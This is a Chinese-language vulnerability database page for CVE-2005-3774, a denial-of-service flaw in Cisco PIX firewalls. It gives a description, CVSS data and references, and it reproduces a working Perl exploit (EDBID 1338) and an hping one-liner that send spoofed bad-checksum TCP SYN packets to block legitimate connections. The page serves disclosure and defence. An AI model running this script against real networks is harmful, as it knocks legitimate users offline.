CVE-2005-3774
CVSS5.0
发布时间 :2005-11-22 19:03:00
修订时间 :2011-03-07 21:27:09
NMCOE    

[原文]Cisco PIX 6.3 and 7.0 allows remote attackers to cause a denial of service (blocked new connections) via spoofed TCP packets that cause the PIX to create embryonic connections that that would not produce a valid connection with the end system, including (1) SYN packets with invalid checksums, which do not result in a RST; or, from an external interface, (2) one byte of "meaningless data," or (3) a TTL that is one less than needed to reach the internal destination.


[CNNVD]Cisco PIX 6.3欺骗TCP SYN报文拒绝服务漏洞(CNNVD-200511-314)

        Cisco PIX是一款硬件防火墙解决方案。
        Cisco PIX在处理畸形的TCP连接报文时存在漏洞,远程攻击者可能利用此漏洞对合法访问源造成拒绝服务攻击。如果通过PIX防火墙发送了有错误校验和的TCP SYN报文的话,PIX就会阻断使用相同源和目标TCP端口及IP地址的新TCP连接,直到大约2分钟后才会允许新的连接。因此攻击者可以发送有错误校验和的特制TCP报文,将源/目标IP和端口设置为合法的主机。一旦PIX防火墙接收了这样的报文,就无法同恶意报文中所指定的凭据建立新的TCP会话,默认时间为2分钟2秒,之后会恢复正常运行。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/h:cisco:pix:7.0
cpe:/h:cisco:pix:6.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3774
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3774
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200511-314
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/853540
(UNKNOWN)  CERT-VN  VU#853540
http://xforce.iss.net/xforce/xfdb/25079
(UNKNOWN)  XF  cisco-pix-ttl-dos(25079)
http://xforce.iss.net/xforce/xfdb/25077
(UNKNOWN)  XF  cisco-pix-tcp-data-field-dos(25077)
http://www.vupen.com/english/advisories/2005/2546
(UNKNOWN)  VUPEN  ADV-2005-2546
http://www.securityfocus.com/bid/15525
(UNKNOWN)  BID  15525
http://www.securityfocus.com/archive/1/archive/1/427041/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060307 RE: Cisco PIX embryonic state machine 1b data DoS
http://www.securityfocus.com/archive/1/archive/1/426991/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060307 Cisco PIX embryonic state machine TTL(n-1) DoS
http://www.securityfocus.com/archive/1/archive/1/426989/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060307 Cisco PIX embryonic state machine 1b data DoS
http://www.securityfocus.com/archive/1/archive/1/417458/30/0/threaded
(UNKNOWN)  BUGTRAQ  20051122 Cisco PIX TCP Connection Prevention
http://www.osvdb.org/24140
(UNKNOWN)  OSVDB  24140
http://www.cisco.com/warp/public/707/cisco-response-20051122-pix.shtml
(UNKNOWN)  CISCO  20051128 Response to Cisco PIX TCP Connection Prevention
http://www.cisco.com/en/US/products/hw/vpndevc/ps2030/products_security_notice09186a0080624a37.html
(UNKNOWN)  CONFIRM  http://www.cisco.com/en/US/products/hw/vpndevc/ps2030/products_security_notice09186a0080624a37.html
http://securitytracker.com/id?1015256
(UNKNOWN)  SECTRACK  1015256
http://secunia.com/advisories/17670
(UNKNOWN)  SECUNIA  17670
http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038983.html
(UNKNOWN)  FULLDISC  20051122 Cisco PIX TCP Connection Prevention
http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038971.html
(VENDOR_ADVISORY)  FULLDISC  20051122 Cisco PIX TCP Connection Prevention

- 漏洞信息

Cisco PIX 6.3欺骗TCP SYN报文拒绝服务漏洞
中危 设计错误
2005-11-22 00:00:00 2007-09-05 00:00:00
远程  
        Cisco PIX是一款硬件防火墙解决方案。
        Cisco PIX在处理畸形的TCP连接报文时存在漏洞,远程攻击者可能利用此漏洞对合法访问源造成拒绝服务攻击。如果通过PIX防火墙发送了有错误校验和的TCP SYN报文的话,PIX就会阻断使用相同源和目标TCP端口及IP地址的新TCP连接,直到大约2分钟后才会允许新的连接。因此攻击者可以发送有错误校验和的特制TCP报文,将源/目标IP和端口设置为合法的主机。一旦PIX防火墙接收了这样的报文,就无法同恶意报文中所指定的凭据建立新的TCP会话,默认时间为2分钟2秒,之后会恢复正常运行。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.cisco.com/warp/public/707/advisory.html

- 漏洞信息 (1338)

Cisco PIX Spoofed TCP SYN Packets Remote Denial of Service Exploit (EDBID:1338)
hardware dos
2005-11-23 Verified
0 Janis Vizulis
N/A [点击下载]
# The easy way by logic logidev@gmail.com (line 2) untested /str0ke
# hping -c 1 -S -s 31337 -k -b -p 22 10.0.xx.xxx

#!/usr/bin/perl
eval ("use Getopt::Long;");die "[error] Getopt::Long perl module is not installed \n" if $@;
eval ("use Net::RawIP;");die "[error] Net::RawIP perl module is not installed \n" if $@;
eval ("use Term::ProgressBar;");
die "[error] Term::ProgressBar perl module is not installed \n" if $@;
my $VERSION = "0.1";
print "$0, $PgmName, V $VERSION \n";
GetOptions ( 
"help" =>\$usage,
"device=s" => \$device, 
"source=s" =>\$sourceip,
"dest=s"=>\$destip,
"sourcemac=s"=>\$sourcemac,
"destmac=s"=>\$destmac,
"port=n"=> \$tcpport,
);

######################## Config option ####################

my $timeout = "0,1"; # Timeout

if ($usage) {&usage;} 

if (!$device) {
$device= 'eth0'; # Network device
}

if (!$destmac) {print "Dest MAC not found \n"; &usage;}
if (!$sourceip) {print "Source IP not found \n"; &usage;}
if (!$destip) {print "Dest IP not found \n"; &usage;}
if (!$tcpport) {print "TCP port not found \n"; &usage;}

my $syn="1"; # TCP SYN SET
my $tcpdata = "TEST"; # TCP payload
my $count=0;

######################################################

#Initialize Progres Bar 
my $progress = Term::ProgressBar->new(32768);
$progress->minor(0);
$packet = new Net::RawIP;
$packet-> ethnew($device);


if (!$sourcemac) {
$packet -> ethset( dest => $destmac);
}else { 
$packet -> ethset( source =>$sourcemac, dest => $destmac);
}



for ($count=0; $count< 65537 ; $count++) {

$packet->set({

ip => {
saddr => $sourceip,
daddr => $destip 
},

tcp => {
check => 0x0010 , # TCP Packet Checksum 0 for auto correct
source => $count,
dest => $tcpport,
syn => $syn,
data => $tcpdata
}});
$packet->ethsend($timeout);
#$packet->send($timeout);

$progress->update($_);
$count++;
}

sub usage {
print <<EOF ;
This program was originally written in the due course of writing
"Hacking Exposed Cisco Networks: Cisco Security Secrets and Solutions" book.
Tool author - Janis Vizulis, Arhont Ltd. (License GPL-2 ) Please send bugs 
and comments to info@arhont.com 

usage: $0 [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=MAC]
[--destmac=MAC] [--port=n]

Options:

--help This message
--device Network interface (defaut set eth0)
--source Victim source IP
--dest Victim destination IP
--sourcemac Victim source MAC
--destmac MAC Address of the gateway
--port TCP port 

Example: ./pixdos.pl --device eth0 --source 192.168.44.10 --dest 192.168.55.111 \
--sourcemac 00:90:27:99:11:b6 --destmac 00:60:27:99:11:b6 --port 22 
EOF

exit shift;
}

# milw0rm.com [2005-11-23]
		

- 漏洞信息

21053
Cisco PIX Crafted TCP SYN Packet Saturation DoS
Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

Cisco PIX contains a flaw that may allow a remote denial of service. The issue is triggered when an attacker floods the device with spoofed TCP SYN packets containing invalid checksums causing the device to temporarily block new connections for the addresses and ports being spoofed.

- 时间线

2005-11-22 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站